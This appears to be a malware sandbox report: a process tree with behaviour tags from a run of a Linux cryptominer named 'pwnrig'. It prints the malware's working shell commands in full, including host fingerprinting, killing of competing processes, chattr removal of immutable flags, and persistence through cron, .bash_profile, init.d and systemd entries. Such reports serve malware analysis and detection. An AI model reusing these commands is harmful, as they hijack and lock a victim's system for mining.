    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    - Attempts to change immutable files
    PID:2551
  - - /bin/hostname
      hostname -I
      4⤵
      Attempts to change immutable files
      PID:2554
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:2556
  - - /bin/cat
      cat /etc/ssh/sshd_config
      4⤵
      PID:2558
  - - /bin/grep
      grep "Port "
      4⤵
      PID:2559
  - - /bin/head
      head -n 1
      4⤵
      PID:2560
  - - /bin/awk
      awk "{print \"-\"\$2}"
      4⤵
      PID:2561
  - - /bin/whoami
      whoami
      4⤵
      PID:2562
  - - /bin/hostname
      hostname
      4⤵
      PID:2563
  - - /bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:2564
  - - /bin/grep
      grep -m 1 "model name" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:2567
  - - /bin/cut
      cut -d: -f2
      4⤵
      PID:2568
  - - /bin/sed
      sed -e "s/^ *//"
      4⤵
      PID:2569
  - - /bin/sed
      sed -e "s/\$//"
      4⤵
      Reads runtime system information
      PID:2570
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:2573
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:2576
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:2579
  - - /bin/awk
      awk "{print \$3}"
      4⤵
      PID:2582
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:2585
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:2588
  - - /bin/awk
      awk "{print \$2\" \"\$3\" \"\$4}"
      4⤵
      PID:2590
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:2591
  - - /bin/ps
      ps -A "-ostat,ppid"
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2592
  - - /bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:2593
  - - /bin/id
      id -u
      4⤵
      PID:2595
  - - /bin/ps
      ps x
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2596
  - - /bin/grep
      grep /etc/cron
      4⤵
      PID:2597
  - - /bin/grep
      grep -v grep
      4⤵
      PID:2598
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:2600
  - - /bin/id
      id -u
      4⤵
      PID:2601
  - - /bin/ps
      ps aux
      4⤵
      Checks CPU configuration
      Reads CPU attributes
      Reads runtime system information
      PID:2602
  - - /bin/grep
      grep -v grep
      4⤵
      PID:2603
  - - /bin/grep
      grep -v -- "-bash[[:space:]]*\$"
      4⤵
      PID:2604
  - - /bin/grep
      grep -v /usr/sbin/httpd
      4⤵
      PID:2605
  - - /bin/awk
      awk "{if(\$3>30.0) print \$2}"
      4⤵
      PID:2606
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
    3⤵
    PID:2608
  - - /bin/id
      id -u
      4⤵
      PID:2609
  - - /bin/ps
      ps aux
      4⤵
      Checks CPU configuration
      Reads CPU attributes
      Reads runtime system information
      PID:2611
  - - /bin/grep
      grep -v grep
      4⤵
      PID:2612
  - - /bin/grep
      grep -- "-bash[[:space:]]*\$"
      4⤵
      PID:2613
  - - /bin/awk
      awk "{if(\$3>30.0) print \$2}"
      4⤵
      PID:2614
  - - /bin/wc
      wc -l
      4⤵
      PID:2615
- /bin/chattr
  chattr -ia /var/spool/cron/crontabs
  2⤵
  - Attempts to change immutable files
  PID:2532
- /bin/chattr
  chattr -ia /etc/cron.hourly/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2533
- /bin/chattr
  chattr -ia /etc/cron.daily/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2534
- /bin/chattr
  chattr -ia /etc/cron.daily/0anacron
  2⤵
  - Attempts to change immutable files
  PID:2535
- /bin/chattr
  chattr -ia /etc/cron.daily/apport
  2⤵
  - Attempts to change immutable files
  PID:2536
- /bin/chattr
  chattr -ia /etc/cron.daily/apt-compat
  2⤵
  - Attempts to change immutable files
  PID:2537
- /bin/chattr
  chattr -ia /etc/cron.daily/dpkg
  2⤵
  - Attempts to change immutable files
  PID:2538
- /bin/chattr
  chattr -ia /etc/cron.daily/man-db
  2⤵
  - Attempts to change immutable files
  PID:2539
- /bin/chattr
  chattr -ia /etc/cron.weekly/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2540
- /bin/chattr
  chattr -ia /etc/cron.weekly/0anacron
  2⤵
  - Attempts to change immutable files
  PID:2541
- /bin/chattr
  chattr -ia /etc/cron.weekly/man-db
  2⤵
  - Attempts to change immutable files
  PID:2542
- /bin/chattr
  chattr -ia /etc/cron.monthly/.placeholder
  2⤵
  - Attempts to change immutable files
  PID:2543
- /bin/chattr
  chattr -ia /etc/cron.monthly/0anacron
  2⤵
  - Attempts to change immutable files
  PID:2544
- /bin/chattr
  chattr -ia /var/spool/cron/atjobs
  2⤵
  - Attempts to change immutable files
  PID:2545
- /bin/bash
  bash -c "find /usr/local/share -type f -regextype egrep -regex '.*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}' -exec rm -rf {} +"
  2⤵
  PID:2546
- /bin/find
  find /usr/local/share -type f -regextype egrep -regex ".*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}" -exec rm -rf "{}" +
  2⤵
  PID:2546
- /bin/bash
  bash -c "echo \"*/2 * * * * nohup /usr/local/share/28bce82f-4b8d-44b3-90c2-8ab3dafd7336 >/dev/null 2>&1 &\" | crontab -"
  2⤵
  PID:2548
- - /bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:2550
- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f
  /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:2623
- - /bin/sh
    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    - Attempts to change immutable files
    PID:2624
  - - /bin/hostname
      hostname -I
      4⤵
      Attempts to change immutable files
      PID:2627
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:2629
  - - /bin/grep
      grep "Port "
      4⤵
      PID:2632
  - - /bin/head
      head -n 1
      4⤵
      PID:2633
  - - /bin/awk
      awk "{print \"-\"\$2}"
      4⤵
      PID:2634
  - - /bin/cat
      cat /etc/ssh/sshd_config
      4⤵
      PID:2631
  - - /bin/whoami
      whoami
      4⤵
      PID:2635
  - - /bin/hostname
      hostname
      4⤵
      PID:2636
  - - /bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:2637
  - - /bin/grep
      grep -m 1 "model name" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:2640
  - - /bin/cut
      cut -d: -f2
      4⤵
      PID:2641
  - - /bin/sed
      sed -e "s/^ *//"
      4⤵
      PID:2642
  - - /bin/sed
      sed -e "s/\$//"
      4⤵
      PID:2643
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:2646
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:2649
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:2652
  - - /bin/awk
      awk "{print \$3}"
      4⤵
      PID:2655
  - - /bin/awk
      awk "{print \$4}"
      4⤵
      PID:2658
  - - /bin/awk
      awk "{print \$1}"
      4⤵
      PID:2661
  - - /bin/awk
      awk "{print \$2\" \"\$3\" \"\$4}"
      4⤵
      PID:2663
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:2664
  - - /bin/ps
      ps -A "-ostat,ppid"
      4⤵
      Reads CPU attributes
      Enumerates kernel/hardware configuration
      Reads runtime system information
      PID:2665
  - - /bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:2666
  - - /bin/id
      id -u
      4⤵
      PID:2668
  - - /bin/ps
      ps x
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:2669
  - - /bin/grep
      grep /etc/cron
      4⤵
      PID:2670
  - - /bin/grep
      grep -v grep
      4⤵
      PID:2671
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
    3⤵
    - Attempts to change immutable files
    - Writes file to tmp directory
    PID:2673
  - - /bin/id
      id -u
      4⤵
      PID:2674
  - - /bin/id
      id -u
      4⤵
      PID:2675
  - - /bin/chattr
      chattr -i -a /bin/bprofr "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:2676
  - - /bin/rm
      rm -rf /bin/bprofr
      4⤵
      PID:2677
  - - /bin/sed
      sed -i /bprofr/d "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:2678
  - - /bin/cp
      cp -f -r -- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f /bin/bprofr
      4⤵
      Writes file to system bin folder
      PID:2679
  - - /bin/id
      id -u
      4⤵
      PID:2680
  - - /bin/chattr
      chattr +i +a /bin/bprofr "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:2681
  - - /bin/mkdir
      mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
      4⤵
      PID:2682
  - - /bin/chattr
      chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
      4⤵
      Attempts to change immutable files
      PID:2683
  - - /bin/rm
      rm -rf /bin/crondr
      4⤵
      PID:2684
  - - /bin/cp
      cp -f -r -- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f /bin/crondr
      4⤵
      Writes file to system bin folder
      PID:2685
  - - /bin/tee
      tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      Creates/modifies Cron job
      PID:2687
  - - /bin/sed
      sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      Attempts to change immutable files
      Creates/modifies Cron job
      PID:2688
  - - /bin/chmod
      chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      PID:2689
  - - /bin/chattr
      chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      Attempts to change immutable files
      PID:2690
  - - /bin/which
      which chkconfig
      4⤵
      PID:2691
  - - /bin/which
      which update-rc.d
      4⤵
      PID:2692
  - - /bin/chattr
      chattr -i -a /etc/init.d/pwnrig /bin/initdr
      4⤵
      Attempts to change immutable files
      PID:2693
  - - /sbin/update-rc.d
      update-rc.d -f pwnrig disable
      4⤵
      PID:2694
  - - /sbin/update-rc.d
      update-rc.d -f pwnrig remove
      4⤵
      PID:2695
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2696
  - - /bin/rm
      rm -rf /bin/initdr
      4⤵
      PID:2820
  - - /bin/cp
      cp -f -r -- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f /bin/initdr
      4⤵
      Writes file to system bin folder
      PID:2821
  - - /bin/tee
      tee /etc/init.d/pwnrig
      4⤵
      Modifies init.d
      PID:2823
  - - /bin/sed
      sed -i "1 s/-e //" /etc/init.d/pwnrig
      4⤵
      Attempts to change immutable files
      Modifies init.d
      PID:2824
  - - /bin/chmod
      chmod +x /etc/init.d/pwnrig /bin/initdr
      4⤵
      PID:2825
  - - /sbin/update-rc.d
      update-rc.d pwnrig defaults
      4⤵
      PID:2826
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2827
  - - /sbin/update-rc.d
      update-rc.d pwnrig enable
      4⤵
      PID:2952
    - - /bin/systemctl
        
        systemctl "--root=/" --quiet enable pwnrig
        5⤵
        
        PID:2953
    - - /bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:2954
  - - /bin/chattr
      chattr +i +a /etc/init.d/pwnrig /bin/initdr
      4⤵
      Attempts to change immutable files
      PID:3079
  - - /bin/which
      which systemctl
      4⤵
      PID:3080
  - - /bin/chattr
      chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      4⤵
      Attempts to change immutable files
      PID:3081
  - - /bin/rm
      rm -rf /bin/sysdr
      4⤵
      PID:3082
  - - /bin/cp
      cp -f -r -- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f /bin/sysdr
      4⤵
      Writes file to system bin folder
      PID:3083
  - - /bin/tee
      tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      4⤵
      Modifies systemd
      PID:3085
  - - /bin/sed
      sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      4⤵
      Attempts to change immutable files
      Reads runtime system information
      PID:3086
  - - /bin/chattr
      chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      4⤵
      Attempts to change immutable files
      PID:3087
  - - /bin/systemctl
      systemctl enable pwnrige.service
      4⤵
      PID:3088
  - - /bin/systemctl
      systemctl enable pwnrigl.service
      4⤵
      PID:3213
  - - /bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:3338
  - - /bin/systemctl
      systemctl reload-or-restart pwnrige.service
      4⤵
      PID:3463
- /tmp/-python37-59bcbe28-2a35-4e11-824b-88ffcec00448
  /tmp/-python37-59bcbe28-2a35-4e11-824b-88ffcec00448
  2⤵
  - Executes dropped EXE
  - Writes file to tmp directory
  PID:3518
- /bin/chattr
  chattr -ia /var/spool/cron/atjobs
  2⤵
  - Attempts to change immutable files
  PID:3847
- /bin/chattr
  chattr -ia /var/spool/cron/crontabs
  2⤵
  - Attempts to change immutable files
  PID:3848
- /bin/chattr
  chattr -ia /var/spool/cron/atjobs
  2⤵
  - Attempts to change immutable files
  PID:3849
- /bin/chattr
  chattr -ia /var/spool/cron/crontabs
  2⤵
  - Attempts to change immutable files
  PID:3850
- /bin/bash
  bash -c "find /usr -type f -regextype egrep -regex '.*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}' -exec rm -rf {} +"
  2⤵
  PID:3851
- /bin/find
  find /usr -type f -regextype egrep -regex ".*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}" -exec rm -rf "{}" +
  2⤵
  PID:3851
- - /bin/rm
    rm -rf /usr/local/share/28bce82f-4b8d-44b3-90c2-8ab3dafd7336
    3⤵
    PID:3852
- /bin/bash
  bash -c "echo \"*/2 * * * * nohup /usr/69c334af-26ef-4ef9-8aef-5d0fcf09fabe >/dev/null 2>&1 &\" | crontab -"
  2⤵
  PID:3853
- - /bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:3855
- /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b
  /tmp/-bash-5592a2cc-8a1d-4d5f-b719-d6918e04d82b -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Writes file to tmp directory
  PID:3859
- - /bin/sh
    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    - Attempts to change immutable files
    PID:3860
  - - /bin/hostname
      hostname -I
      4⤵
      Attempts to change immutable files
